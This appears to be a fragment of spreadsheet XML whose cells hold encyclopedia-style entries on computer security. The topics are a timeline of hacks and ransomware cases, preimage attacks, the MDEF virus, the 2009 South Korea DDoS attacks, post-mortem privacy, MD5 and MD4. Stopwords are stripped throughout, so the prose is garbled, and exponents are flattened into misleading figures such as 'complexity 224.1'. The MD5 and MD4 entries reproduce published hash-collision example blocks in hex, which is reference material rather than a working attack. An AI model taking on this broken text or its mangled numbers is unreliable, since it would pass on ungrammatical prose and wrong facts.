brokers) september: hacker ardit ferizi sentenced years prison arrested hacking u.s. servers passing leaked information members isil terrorist group back 2015. october: 2016 cyberattack conducted botnet consisting iots infected mirai hacktivist groups spainsquad, anonymous, world hackers, reportedly retaliation ecuador's rescinding internet access wikileaks founder julian assange embassy london, granted asylum. late 2016: hackers steal international personal user data company uber, including phone numbers, email addresses, names, million people 600,000 driver's license numbers drivers company. uber's github account accessed amazon's cloud-based service. uber paid hackers $100,000 assurances data destroyed. december 2016: yahoo! data breaches reported affected billion users. data leakage includes user names, email addresses, telephone numbers, encrypted unencrypted security questions answers, dates birth, hashed passwords 2017 april: hacker group calling "the dark overlord" posted unreleased episodes orange black series online failing extort online entertainment company netflix. may: wannacry ransomware attack started friday, 2017, described unprecedented scale, infecting 230,000 computers countries. hacked unreleased disney film held ransom, paid bitcoin. may: 25,000 digital photos scans relating patients grozio chirurgija cosmetic surgery clinic lithuania obtained published without consent unknown group demanding ransoms. thousands clients countries affected. breach brought attention weaknesses lithuania's information security. june: 2017 petya cyberattack. june: triton (trisis), malware framework designed reprogram triconex safety instrumented systems (sis) industrial control systems (ics), discovered saudi arabian petrochemical plant. august: hackers demand $7.5 million bitcoin stop pre-releasing shows scripts, including ballers, room game thrones. may–july 2017: equifax breach. september 2017: deloitte breach. december: mecklenburg county, north carolina computer systems hacked. they ransom. 2018 march: computer systems city atlanta, u.s. state georgia, seized hackers ransomware. they ransom, iranians indicted cyber crime charges breach. town wasaga beach ontario, canada computer systems seized hackers ransomware. september: facebook hacked, exposing hackers personal information estimated million facebook users (initially estimated million) hackers "stole" "access tokens" 400,000 facebook users. information accessible hackers included users' email addresses, phone numbers, lists friends, groups members users' search information, posts timelines, names recent messenger conversations. october: west haven, connecticut computer systems seized hackers ransomware, paid $2,000 ransom. november: first u.s. indictment individual people ransomware attacks occurs. u.s. justice department indicted faramarz shahi savandi mohammad mehdi shah mansouri allegedly used samsam ransomware extortion, netting million ransom payments. companies infected ransomware included allscripts, medstar health, hollywood presbyterian medical center. altogether, attacks caused victims lose million, addition ransom payments. marriott disclosed starwood hotel brand subject security breach. 2019 march: jackson county computer systems u.s. state georgia seized hackers ransomware, paid $400,000 ransom. city albany u.s. state york experiences ransomware cyber attack. april: computer systems city augusta, u.s. state maine, seized hackers using ransomware. city greenville (north carolina)'s computer systems seized hackers using ransomware known robbinhood. imperial county, u.s. state california, computer systems seized hackers using ryuk ransomware. may: computer systems belonging city baltimore seized hackers using ransomware known robbinhood encrypts files "file-locking" virus, well tool eternalblue. june: city riviera beach, florida paid roughly $600,000 ransom bitcoin hackers seized computers using ransomware. hackers stole hours unreleased music band radiohead demanding $150,000 ransom. radiohead released music public anyway ransom. november: anonymous hacktivist collective announced hacked four chinese computer databases donated data breach indexing/notification service vigilante.pw. hack conducted order support 2019 hong kong protests, amidst hong kong police's siege city's polytechnic university. they also brought possible peace plan first proposed professor inha university hopes korean reunification five demands hong kong protest fulfilled once. 2020s 2020 february: anonymous hacked united nations website created page taiwan, country seat since 1971. hacked page featured flag taiwan, emblem, taiwan independence flag, anonymous logo, embedded youtube videos taiwanese national anthem closing score 2019 film avengers: endgame titled "it's been long, long time", caption. hacked server belonged united nations department economic social affairs. may: anonymous declared large hack three days murder george floyd. individual claiming represent anonymous stated legion. forgive. forget. expect us." now-deleted video. anonymous addressed police brutality said "will exposing [their] many crimes world". suspected anonymous cause downtime public suspension minneapolis police department website parent site, website city minneapolis. may: indian national shubham upadhyay posed superintendent police and, using social engineering, used free caller identification call in-charge kotwali police station, gupta, order threaten phone repaired amidst covid-19 lockdown. attempt foiled. june: anonymous claimed responsibility stealing leaking trove documents collectively nicknamed 'blueleaks'. 269-gigabyte collection published leak-focused activist group known distributed denial secrets. furthermore, collective took atlanta police department's website ddos, defaced websites filipino governmental webpage brookhaven national labs. they expressed support julian assange press freedom, briefly "taking swing" facebook, reddit wikipedia </t>
  </si>
  <si>
    <t>Preimage attack</t>
  </si>
  <si>
    <t>cryptography, preimage attack cryptographic hash functions tries find message specific hash value. cryptographic hash function resist attacks preimage (set possible inputs). context attack, types preimage resistance: preimage resistance: essentially pre-specified outputs, computationally infeasible find input hashes output; i.e., given difficult find h(x) second-preimage resistance: specified input, computationally infeasible find another input produces output; i.e., given difficult find second input h(x) h(x′).these compared collision resistance, computationally infeasible find distinct inputs hash output; i.e., h(x) h(x′).collision resistance implies second-preimage resistance, guarantee preimage resistance. conversely, second-preimage attack implies collision attack (trivially, since, addition already known right start). applied preimage attacks definition, ideal hash function fastest compute first second preimage brute-force attack. n-bit hash, attack time complexity considered high typical output size bits. complexity best achieved adversary, hash function considered preimage-resistant. however, general result quantum computers perform structured preimage attack {\displaystyle {\sqrt {2^{n}}}=2^{\frac {n}{2}}} also implies second preimage thus collision attack. faster preimage attacks found cryptanalysing certain hash functions, specific function. some significant preimage attacks already discovered, practical. practical preimage attack discovered, would drastically affect many internet protocols. case, "practical" means could executed attacker reasonable amount resources. example, preimaging attack costs trillions dollars takes decades preimage desired hash value message practical; costs thousand dollars takes weeks might practical. currently known practical almost-practical attacks sha-1 collision attacks. general, collision attack easier mount preimage attack, restricted value (any values used collide). time complexity brute-force collision attack, contrast preimage attack, 2n/2. restricted preimage space attacks computational infeasibility first preimage attack ideal hash function assumes possible hash inputs large brute force search. however given hash value known produced inputs relatively small ordered likelihood way, brute force search effective. practicality depends input size speed cost computing hash function. common example hashes store password validation data authentication. rather store plaintext user passwords, access control system stores hash password. when user requests access, password submit hashed compared stored value. stored validation data stolen, thief hash values, passwords. however users choose passwords predictable ways many passwords short enough possible combinations tested fast hashes used, even hash rated secure preimage attacks. special hashes called derivation functions created slow searches. password cracking. also birthday attack cryptographic hash function hash function security summary rainbow table random oracle 4270: attacks cryptographic hashes internet protocols references</t>
  </si>
  <si>
    <t>MDEF</t>
  </si>
  <si>
    <t>mdef computer virus affecting macintosh machines. there four known strains. first, mdef (aka garfield), discovered 1990. strains (aka cat), discovered august 1990, october 1990, january 1991, respectively. mdef infect application files system files, sometimes document files well. strain infect applications. none viruses designed damage, often mdef sometimes damage applications beyond repair. quick action computer security personnel york state police resulted identification author, juvenile. this person responsible writing cdef virus. references norstad, john. viruses. disinfectant 3.7.1 ©1988-1997 northwestern university.</t>
  </si>
  <si>
    <t>2009 DDoS attacks against South Korea</t>
  </si>
  <si>
    <t>july 2009 cyberattacks series coordinated cyberattacks major government, news media, financial websites south korea united states. attacks involved activation botnet—a large number hijacked computers—that maliciously accessed targeted websites intention causing servers overload influx traffic, known ddos attack. most hijacked computers located south korea. estimated number hijacked computers varies widely; around 20,000 according south korean national intelligence service, around 50,000 according symantec's security technology response group, 166,000 according vietnamese computer security researcher analyzed files servers attackers controlled. investigation revealed least websites targets attacks based files stored compromised systems.the targeting timing attacks—which started north korean short-range ballistic missile test—have suggestions north korea, although suggestions substantiated. researchers would later find links cyberattacks, darkseoul attacks 2013, attacks attributed lazarus group. this attack considered beginning series ddos attacks carried lazarus dubbed "operation troy." timeline attacks first wave first wave attacks occurred july 2009 (independence holiday united states), targeting united states south korea. among websites affected white house, pentagon, york stock exchange, washington post, nasdaq, amazon. second wave second wave attacks occurred july 2009, affecting south korea. among websites targeted presidential blue house, ministry defense, ministry public administration security, national intelligence service national assembly. security researcher chris kubecka presented evidence multiple european union united kingdom companies unwittingly helped attack south korea w32.dozer infections, malware used part attack. some companies used attack partially owned several governments, complicating attribution. third wave third wave attacks began july 2009, targeting several websites south korea, including country's national intelligence service well largest banks major news agency. u.s. state department said july website also came attack. state department spokesman kelly said: "i'm going speak website, state government website. there's high volume attacks. we're still concerned they continuing." u.s. department homeland security spokesperson kudwa said department aware attacks issued notice u.s. federal departments agencies take steps mitigate attacks. effects despite fact attacks targeted major public private sector websites, south korean presidential office suggested attacks conducted purpose causing disruption, rather stealing data. however, jose nazario, manager u.s. network security firm, claimed attack estimated produced megabits data second, enough cause major disruptions. that said, sites reported service disruptions days following attack.later, discovered malicious code responsible causing attack, trojan.dozer accompanying dropper w32.dozer, programmed destroy data infected computers prevent computers rebooted. unclear mechanism ever activated. security experts said attack re-used code mydoom worm spread infections computers. experts shared malware used attack "used sophisticated techniques evade detection anti-virus software appear written someone experienced coding malware."it expected economic costs associated websites would large, disruption prevented people carrying transactions, purchasing items conducting business. perpetrators known behind attacks. reports indicate type attacks used, commonly known distributed denial-of-service attacks, unsophisticated. given prolonged nature attacks, recognized coordinated organized series attacks.according south korean national intelligence service, source attacks tracked government activated emergency cyber-terror response team blocked access five host sites containing malicious code websites downloaded code, located countries, including united states, guatemala, japan people's republic china, north korea among them.the timing attack analysts suspicious north korea. attack started july 2009, north korean short-range ballistic missile launch, also occurred less month passage security council resolution 1874, imposed economic commercial sanctions north korea response underground nuclear test conducted earlier year. south korean police analyzed sample thousands computers used botnet, stating "various evidence" involvement north korea "pro-north elements," said find culprit. intelligence officials south korean government warned lawmakers "north korean military research institute ordered destroy south's communications networks."joe stewart, researcher secureworks' counter threat unit, noted data generated attacking program appeared based korean-language browser.various security experts questioned narrative attack originated north korea. analyst thinks attacks likely came united kingdom, technology analyst enderle hypothesizes "overactive students" blame. stewart secureworks speculated attention-seeking behavior drove attack, though notes breadth attack "unusual."on october 2009, south korea's agency, national intelligence service, named north korea perpetrator attack. according head sei-hoon, organization found link attacks north korea address north korean ministry post telecommunications allegedly "[was] using rent (from china)." also 2007 cyberattacks estonia cyberterrorism cyber storm exercise moonlight maze titan rain comparison computer viruses denial-of-service attack references</t>
  </si>
  <si>
    <t>Post-mortem privacy</t>
  </si>
  <si>
    <t>post-mortem privacy person's ability control dissemination personal information death. individual's reputation dignity death also subject post-mortem privacy protections. federal laws specifically extend post-mortem privacy protection. state level, privacy laws pertaining deceased vary significantly, general extend clear rights privacy beyond property rights. relative lack acknowledgment post-mortem privacy rights sparked controversy, rapid technological advancements resulted increased amounts personal information stored shared online. united states under common law, right privacy considered personal right, meaning applies living and, consequently, recognize privacy interests deceased. because this, defamation privacy torts used prevent unjust damage individuals' reputations cannot extended post-mortem. example, family cannot file suit invasion privacy behalf deceased relative personal right; exerted person whose rights infringed upon. addition, deceased qualify privacy protections held constitutional statutory rights, noted fourth fourteenth amendments. judicial justification termination privacy rights death centered main points: firstly, deceased longer active agents, secondly, deceased incapable harmed invasion privacy defamation. clear extension postmortem privacy rights federal pertaining property. will, private property personal information passed heirs accordance decedent's wishes. most post-mortem privacy protection occurs state level. thus, legislation degree protection varies widely state state. relevant court cases jesse james, screen gems inc. established rights privacy survive death. widow jesse james, filed suit screen gems behalf late husband, claiming name documentary invasion privacy. court decided claim insufficient applied husband. medical confidentiality medical confidentiality upheld state federal law. because state legislation varies considerably, congress passed explicit medical privacy regulations 2000 health insurance portability accountability (hipaa). however, briefly mentions postmortem privacy rights, stating protection ceases years death. moreover, legal mandate exists regarding patients' wishes death. during life, informed consent basis managing patient medical history. however, since informed consent longer possible post-mortem, confidential medical information risk exploited number ways. first, highly sensitive information, genetic information, potential health factors, diseases, easily disseminated patient wanted. addition, legal consent research patient's biological material longer applies deceased individuals, allowing research conducted deceased patients without requiring permission.the dissemination autopsy records become significant issue recent years. state legislation dictating dissemination autopsy records characterized three groups: prioritizing confidentiality, prioritizing complete transparency, middle ground limits aspects disclosure privacy protection. inconsistencies surrounding legislation also potential expose personal medical information also affect living relatives patient. example, certain genetic diseases patient's family want known public could exposed, lead raising health insurance premiums employment difficulties. case henrietta lacks henrietta lacks african american woman whose cells removed without consent receiving cancer treatment. cells became source foundational hela cell line scientific world today. lacks family neither informed asked consent cells research. 1980s lacks's medical records made public, exposing rest family's medical information well fact family never informed this. major issue surrounding lacks case twofold. firstly, point consent sought extraction research lacks's cells. secondly, family never received compensation commercial hela cell line. autopsy death scene photographs under process clause, family members generally maintain right control dissemination photos deceased relatives. privacy rights context extend privacy living relatives decedent, actual deceased. most court rulings regarding autopsy death scene photos looked precedent federal freedom information (foia), determines circumstances release images appropriate invasive living person's privacy. case emmett till while families wish conceal images deceased loved ones, mamie till bradley, mother emmett till, decided make photos brutally murdered public spite officials' attempts ignore event. photos exposed horrendous realities racial injustice america became rallying call many influential civil rights figures, including martin luther king muhammad ali. moreover, images forced americans confront deep-rooted racism america despite many white americans’ attempts remain ignorant despicable happenings, especially south. relevant court cases york times company nasa, d.c. district court denied york times' request freedom information (foia) access audio recordings astronauts involved challenger explosion moments event. major argument case came weighing public interest decedents' families, court ruled favor protecting decedents' families, claiming exposing tapes could cause relatives astronauts trauma.national archives records administration favish similarly found foia, privacy rights decedents' relatives acknowledged prioritized disseminating autopsy/death scene photos deceased. this decision made regards death scene photos vincent foster, deputy counsel bill clinton.marsh county diego determined prosecutor photocopied released autopsy photo deceased child retirement could sued doctrine qualified immunity. major point case whether brenda marsh legal right control dissemination son's autopsy photos, though court determined did, ruled technicality time events, "clearly established." digital assets past decade seen unprecedented amount data stored online accounts. because relative newness phenomenon, legal mandate exists person's digital assets handled death. terms service agreements user service provider remain closest variant available. order maintain users' privacy protection, many agreements make difficult third parties access online accounts user died. yahoo!, example, states terms service agreement account permanently deleted upon user's death. google requires lengthy process involves getting court order obtain content deceased user's account. there also option allow someone manage account, make inactive, delete altogether user died. facebook allowed memorialization deceased users' accounts, aims maintain privacy user allowing friends family still interact account. requesting information account long difficult process. recently, company updated policy allow "legacy contact," wherein user appoint someone take account die. policy also offers option account permanently deleted upon death.the rigid policies service providers become increasingly problematic online transactions data storage become popular, personal representatives consequently found increasing need access online accounts order carry estate transfers will orders. states began proposing legislation address problem early 2000s, legislation favoring access decedents' accounts became overwhelmingly supported. delaware's access digital assets example legislation already passed state level, grants family members deceased individuals full access online accounts profiles. however, stringent terms service agreements service providers still make access accounts difficult cases. thus, major contemporary legislative proposals come forth address issue. july 2014, uniform commission (ulc) proposed uniform fiduciary access digital assets (ufadaa) provide fiduciaries easy access digital accounts deceased clients. twenty-six states proposed legislation based ufadaa; however, legislation failed state. response this, netchoice, major rival ulc, proposed privacy expectation afterlife choices (peac), included much stringent guidelines giving fiduciaries access digital accounts overall considered much privacy-centric. only four states proposed peac legislation 2014, virginia actually implemented 2015. shortly passing ufadaa, passed revised version (rufadaa). this legislative proposal incorporated privacy centered aspects aligned peac, even gained support netchoice. moreover, thirty-one states proposed legislation accordance rufadaa. however, critics legislation contest transformation still give much consideration decedent's post-mortem privacy information kept account. google announced 2020 delete photos cloud files years inactivity. celebrity images persona post-mortem publicity rights right publicity created extension right privacy. developed intent provided unique privacy rights celebrities anyone whose persona name commercial value. because people constantly public eye, general rights privacy oftentimes applicable, thus publicity rights accommodate situation. right publicity essentially grants person right control portrayal public eye, specifically regard commercial use. copyright laws, aimed protecting ownership rights original works, contain significant amount overlap publicity rights. much like post-mortem privacy rights, blatant federal rights publicity established, leaving recognition individual states. whether states laws regarding post-mortem publicity dependent upon whether state classifies right privacy right property right. classified personal right, states recognize post-mortem rights publicity stipulation personal rights apply living. classified property right, upkeep transfer publicity rights follow similar tract property. most states acknowledge specific duration post-mortem publicity rights, generally range forty hundred years. because post-mortem publicity rights vary state state, court precedent determined establishing person's post-mortem publicity rights, legislation state decedent lived must adhered relevant court cases haelan laboratories, inc. topps chewing gum, inc. established right publicity, granting individuals control commercial identity.shaw family archives ltd. worldwide, inc. determined marilyn monroe's estate post-mortem right publicity neither state residency, york california, recognized post-mortem rights publicity.in experience hendrix hendrixlicensing.com, hendrix, despite son's sole heir, denied acquisition jimi hendrix's publicity rights fact york, time, acknowledge post-mortem publicity rights. controversy deceased celebrities' likenesses sparked controversy, mainly regarding potential image used inconsistent celebrity's desire. this occur celebrity's image advertising product, service, recreation celebrity likeness commercial, noncommercial, celebrity would otherwise agree lifetime. this raises questions potential violation celebrity's privacy individual's image without consent. this seen 2012 coachella concert, featured digital recreation tupac shakur. virtual clone performed stage, rapping song never recorded tupac life. digital cloning similar recreations celebrities could become serious privacy concern reproduced control represented. discretion regarding digital personas entirely whomever owns right celebrity's image, inevitably opens possibility decedent's interest prioritized. references</t>
  </si>
  <si>
    <t>MD5</t>
  </si>
  <si>
    <t>message-digest algorithm cryptographically broken still widely used hash function producing 128-bit hash value. although initially designed used cryptographic hash function, found suffer extensive vulnerabilities. still used checksum verify data integrity, unintentional corruption. remains suitable non-cryptographic purposes, example determining partition particular partitioned database, preferred lower computational requirements recent secure hash algorithms.md5 designed ronald rivest 1991 replace earlier hash function md4, specified 1992 1321. basic requirement cryptographic hash function computationally infeasible find distinct messages hash value. fails requirement catastrophically; collisions found seconds ordinary home computer. december 2008, software engineering institute concluded essentially "cryptographically broken unsuitable use". weaknesses exploited field, infamously flame malware 2012. 2019, continues widely used, despite well-documented weaknesses deprecation security experts. history cryptanalysis series message digest algorithms designed professor ronald rivest (rivest, 1992). when analytic work indicated md5's predecessor likely insecure, rivest designed 1991 secure replacement. (hans dobbertin indeed later find weaknesses md4.) 1993, boer bosselaers gave early, although limited, result finding "pseudo-collision" compression function; different initialization vectors produce identical digest. 1996, dobbertin announced collision compression function (dobbertin, 1996). while attack full hash function, close enough cryptographers recommend switching replacement, sha-1 (also compromised) ripemd-160. size hash value (128 bits) small enough contemplate birthday attack. md5crk distributed project started march 2004 demonstrate practically insecure finding collision using birthday attack. md5crk ended shortly august 2004, collisions full announced xiaoyun wang, dengguo feng, xuejia lai, hongbo their analytical attack reported take hour p690 cluster.on march 2005, arjen lenstra, xiaoyun wang, benne weger demonstrated construction x.509 certificates different public keys hash value, demonstrably practical collision. construction included private keys public keys. days later, vlastimil klima described improved algorithm, able construct collisions hours single notebook computer. march 2006, klima published algorithm could find collision within minute single notebook computer, using method calls tunneling.various md5-related errata published. 2009, united states cyber command used hash value mission statement part official emblem.on december 2010, dengguo feng announced first published single-block (512-bit) collision. (previous collision discoveries relied multi-block attacks.) "security reasons", feng disclose attack method. they issued challenge cryptographic community, offering us$10,000 reward first finder different 64-byte collision january 2013. marc stevens responded challenge published colliding single-block messages well construction algorithm sources.in 2011 informational 6151 approved update security considerations hmac-md5. security security hash function severely compromised. collision attack exists find collisions within seconds computer pentium processor (complexity 224.1). further, also chosen-prefix collision attack produce collision inputs specified prefixes within seconds, using off-the-shelf computing hardware (complexity 239). ability find collisions greatly aided off-the-shelf gpus. nvidia geforce 8400gs graphics processor, 16–18 million hashes second computed. nvidia geforce 8800 ultra calculate million hashes second.these hash collision attacks demonstrated public various situations, including colliding document files digital certificates. 2015, demonstrated still quite widely used, notably security research antivirus companies.as 2019, quarter widely used content management systems reported still password hashing. overview security issues 1996, flaw found design md5. while deemed fatal weakness time, cryptographers began recommending algorithms, sha-1, since found vulnerable well. 2004 shown collision-resistant. such, suitable applications like certificates digital signatures rely property digital security. researchers additionally discovered serious flaws md5, described feasible collision attack method create pair inputs produces identical checksums. further advances made breaking 2005, 2006, 2007. december 2008, group researchers used technique fake certificate validity.as 2010, software engineering institute considers "cryptographically broken unsuitable use", u.s. government applications require sha-2 family hash functions. 2012, flame malware exploited weaknesses fake microsoft digital signature. collision vulnerabilities 1996, collisions found compression function md5, hans dobbertin wrote laboratories technical newsletter, "the presented attack threaten practical applications md5, comes rather close future longer implemented collision-resistant hash function required."in 2005, researchers able create pairs postscript documents x.509 certificates hash. later year, md5's designer rivest wrote "md5 sha1 clearly broken terms collision-resistance)".on december 2008, group researchers announced 25th chaos communication congress used collisions create intermediate certificate authority certificate appeared legitimate checked hash. researchers used cluster epfl lausanne, switzerland change normal certificate issued rapidssl working certificate issuer, could used create certificates would appear legitimate issued rapidssl. verisign, issuers rapidssl certificates, said stopped issuing certificates using checksum algorithm rapidssl vulnerability announced. although verisign declined revoke existing certificates signed using md5, response considered adequate authors exploit (alexander sotirov, marc stevens, jacob appelbaum, arjen lenstra, david molnar, arne osvik, benne weger). bruce schneier wrote attack already knew broken hash function" using anymore". researchers wrote, "our desired impact certification authorities stop using issuing certificates. also hope applications reconsidered well."in 2012, according microsoft, authors flame malware used collision forge windows code-signing certificate.md5 uses merkle–damgård construction, prefixes hash constructed, common suffix added make collision likely accepted valid data application using furthermore, current collision-finding techniques allow specify arbitrary prefix: attacker create colliding files begin content. attacker needs generate colliding files template file 128-byte block data, aligned 64-byte boundary, changed freely collision-finding algorithm. example collision, messages differing bits, d131dd02c5e6eec4 693d9a0698aff95c 2fcab58712467eab 4004583eb8fb7f89 55ad340609f4b302 83e488832571415a 085125e8f7cdc99f d91dbdf280373c5b d8823e3156348f5b ae6dacd436c919c6 dd53e2b487da03fd 02396306d248cda0 e99f33420f577ee8 ce54b67080a80d1e c69821bcb6a88393 96f9652b6ff72a70 d131dd02c5e6eec4 693d9a0698aff95c 2fcab50712467eab 4004583eb8fb7f89 55ad340609f4b302 83e4888325f1415a 085125e8f7cdc99f d91dbd7280373c5b d8823e3156348f5b ae6dacd436c919c6 dd53e23487da03fd 02396306d248cda0 e99f33420f577ee8 ce54b67080280d1e c69821bcb6a88393 96f965ab6ff72a70 both produce hash 79054025255fb1a26e4bc422aef54eb4. difference samples leading nibble flipped. example, 20th byte (offset 0x13) sample, 0x87, 10000111 binary. leading byte (also leading first nibble) flipped make 00000111, 0x07, shown lower sample. later also found possible construct collisions files separately chosen prefixes. this technique used creation rogue certificate 2008. variant parallelized collision searching using proposed anton kuznetsov 2014, allowed finding collision hours computing cluster. preimage vulnerability april 2009, attack published breaks md5's preimage resistance. this attack theoretical, computational complexity 2123.4 full preimage. applications digests widely used software world provide assurance transferred file arrived intact. example, file servers often provide pre-computed (known md5sum) checksum files, user compare checksum downloaded file most unix-based operating systems include utilities distribution packages; windows users included powershell function "get-filehash", install microsoft utility, third-party applications. android roms also type checksum. easy generate collisions, possible person created file create second file checksum, technique cannot protect forms malicious tampering. cases, checksum cannot trusted (for example, obtained channel downloaded file), case provide error-checking functionality: recognize corrupt incomplete download, becomes likely downloading larger files. historically, used store one-way hash password, often stretching. nist include list recommended hashes password storage.md5 also used field electronic discovery, provide unique identifier document exchanged legal discovery process. this method used replace bates stamp numbering system used decades exchange paper documents. above, usage discouraged ease collision attacks. algorithm processes variable-length message fixed-length output bits. input message broken chunks 512-bit blocks (sixteen 32-bit words); message padded length divisible 512. padding works follows: first, single bit, appended message. this followed many zeros required bring length message bits fewer multiple 512. remaining bits filled bits representing length original message, modulo 264. main algorithm operates 128-bit state, divided four 32-bit words, denoted these initialized certain fixed constants. main algorithm uses 512-bit message block turn modify state. processing message block consists four similar stages, termed rounds; round composed similar operations based non-linear function modular addition, left rotation. figure illustrates operation within round. there four possible functions; different used round: {\displaystyle {\begin{aligned}f(b,c,d)&amp;=(b\wedge {c})\vee (\neg {b}\wedge {d})\\g(b,c,d)&amp;=(b\wedge {d})\vee (c\wedge \neg {d})\\h(b,c,d)&amp;=b\oplus c\oplus d\\i(b,c,d)&amp;=c\oplus (b\vee \neg {d})\end{aligned}}} {\displaystyle \oplus ,\wedge ,\vee ,\neg denote xor, and, operations respectively. pseudocode hash calculated according algorithm. values little-endian. variables unsigned wrap modulo 2^32 calculating s[64], k[64] specifies per-round shift amounts 0..15] s[16..31] s[32..47] s[48..63] binary integer part sines integers (radians) constants: k[i] floor(232 (sin(i 1))) following precomputed table): 0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501 8..11] 0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be k[12..15] 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821 k[16..19] 0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa k[20..23] 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8 k[24..27] 0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed k[28..31] 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a k[32..35] 0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c k[36..39] 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70 k[40..43] 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05 k[44..47] 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665 k[48..51] 0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039 k[52..55] 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1 k[56..59] 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1 k[60..63] 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 initialize variables: 0x67452301 0xefcdab89 0x98badcfe 0x10325476 pre-processing: adding single append message notice: input bytes considered bits strings, first significant byte. pre-processing: padding zeros append message length bits (mod 512) notice: padding steps implemented simpler implementations work complete bytes: append 0x80 0x00 bytes message length bytes (mod 64). append original length bits message process message successive 512-bit chunks: 512-bit chunk padded message break chunk sixteen 32-bit words m[j], initialize hash value chunk: main loop: ((not else ((not (5×i else (3×i else (not (7×i) wary definitions a,b,c,d k[i] m[g] m[g] must 32-bits block leftrotate(f, s[i]) chunk's hash result far: char digest[16] append append append (output little-endian) instead formulation original 1321 shown, following used improved efficiency (useful assembly language used otherwise, compiler generally optimize code. since computation dependent another formulations, often slower method nand/and parallelised): 15): 31): hashes 128-bit (16-byte) hashes (also termed message digests) typically represented sequence hexadecimal digits. following demonstrates 43-byte ascii input corresponding hash: md5("the quick brown jumps lazy dog") 9e107d9d372bb6826bd81d3542a419d6 even small change message (with overwhelming probability) result mostly different hash, avalanche effect. example, adding period sentence: md5("the quick brown jumps lazy dog.") e4d909c290d0fb1ca068ffaddf22cbd0 hash zero-length string md5("") d41d8cd98f00b204e9800998ecf8427e algorithm specified messages consisting number bits; limited multiples eight bits (octets, bytes). some implementations md5sum might limited octets, might support streaming messages initially undetermined length. implementations below list cryptography libraries support md5: botan bouncy castle cryptlib crypto++ libgcrypt nettle openssl wolfssl also comparison cryptographic hash functions hash function security summary hashclash md5crypt md5deep md5sum sha-1 sha-2 references further reading berson, thomas (1992). "differential cryptanalysis applications md5". eurocrypt. 71–80. isbn 3-540-56413-6. bert boer; antoon bosselaers (1993). "collisions compression function md5". advances cryptology eurocrypt '93. eurocrypt. berlin; london: springer. 293–304. isbn 978-3-540-57600-6. hans dobbertin, cryptanalysis compress. announcement internet, 1996. "citeseerx". citeseer.ist.psu.edu. retrieved august 2010. dobbertin, hans (1996). "the status after recent attack". cryptobytes. (2). xiaoyun wang; hongbo (2005). "how break other hash functions" (pdf). eurocrypt. isbn 3-540-25910-4. archived original (pdf) 2009. retrieved march 2008. external links recommendation</t>
  </si>
  <si>
    <t>MD4</t>
  </si>
  <si>
    <t>message-digest algorithm cryptographic hash function developed ronald rivest 1990. digest length bits. algorithm influenced later designs, md5, sha-1 ripemd algorithms. initialism "md" stands "message digest". security severely compromised. first full collision attack published 1995, several newer attacks published since then. 2007, attack generate collisions less hash operations. theoretical preimage attack also exists. variant used ed2k scheme provide unique identifier file popular edonkey2000 emule networks. also used rsync protocol (prior version 3.0.0). used compute ntlm password-derived digests microsoft windows vista, security weaknesses demonstrated boer bosselaers paper published 1991. first full-round collision attack found hans dobbertin 1995, took seconds carry time. august 2004, wang found efficient collision attack, alongside attacks later hash function designs md4/md5/sha-1/ripemd family. this result improved later sasaki al., generating collision cheap verifying microseconds).in 2008, preimage resistance also broken gaëtan leurent, 2102 attack. 2010 published 299.7 attack.in 2011, 6150 stated 1320 (md4) historic (obsolete). hashes 128-bit (16-byte) hashes (also termed message digests) typically represented 32-digit hexadecimal numbers. following demonstrates 43-byte ascii input corresponding hash: md4("the quick brown jumps lazy dog") 1bee69a46ba811185c194762abaeae90 even small change message (with overwhelming probability) result completely different hash, e.g. changing md4("the quick brown jumps lazy cog") b86e130ce7028da59e672d56ad0113df hash zero-length string md4("") 31d6cfe0d16ae931b73c59d7e0c089c0 test vectors following test vectors defined 1320 (the message-digest algorithm) ("") 31d6cfe0d16ae931b73c59d7e0c089c0 ("a") bde52cb31de33e46245e05fbdbd6fb24 ("abc") a448017aaf21d8525fc10ae87aa6729d ("message digest") d9130a8164549fe818874806e1c7014b ("abcdefghijklmnopqrstuvwxyz") d79e1c308aa5bbcdeea8ed63df412da9 ("abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789") 043f8582f241db351ce627e153e7f0e4 ("12345678901234567890123456789012345678901234567890123456789012345678901234567890") e33b4ddc9c38f2199c3e7b164fcc0536 collision example let: 839c7a4d7a92cb5678a5d5b9eea5a7573c8a74deb366c3dc20a083b69f5d2a3bb3719dc69891e9f95e809fd7e8b23ba6318edd45e51fe39708bf9427e9c3e8b9 839c7a4d7a92cbd678a5d529eea5a7573c8a74deb366c3dc20a083b69f5d2a3bb3719dc69891e9f95e809fd7e8b23ba6318edc45e51fe39708bf9427e9c3e8b9 md4(k1) md4(k2) 4d7e6a1defa93d2dde05b45d864c429b note hex-digits define byte input string, whose length bytes also hash function security summary comparison cryptographic hash functions references bert boer, antoon bosselaers: attack last rounds md4. crypto 1991: 194–203 hans dobbertin: cryptanalysis md4. fast software encryption 1996: 53–69 hans dobbertin, 1998. cryptanalysis md4. cryptology 11(4): 253–271 xiaoyun wang, xuejia lai, dengguo feng, chen, xiuyuan cryptanalysis hash functions ripemd. eurocrypt 2005: 1–18 sasaki, wang, kazuo ohta, noboru kunihiro: message difference md4. fast software encryption 2007: 329–348 external links 1320 description rivest 6150 historic status rivest, ronald (1991). "the message digest algorithm". advances cryptology crypto '90: proceedings. advances cryptology-crypt0' lecture notes computer science. vol. 537. springer berlin heidelberg. 303–311. doi:10.1007/3-540-38424-3_22. isbn 978-3-540-54508-8. collision attacks attack last rounds improved collision attack bishop (formerly stach liu) fast collision generator</t>
  </si>
  <si>
    <t>Postini</t>
  </si>
  <si>
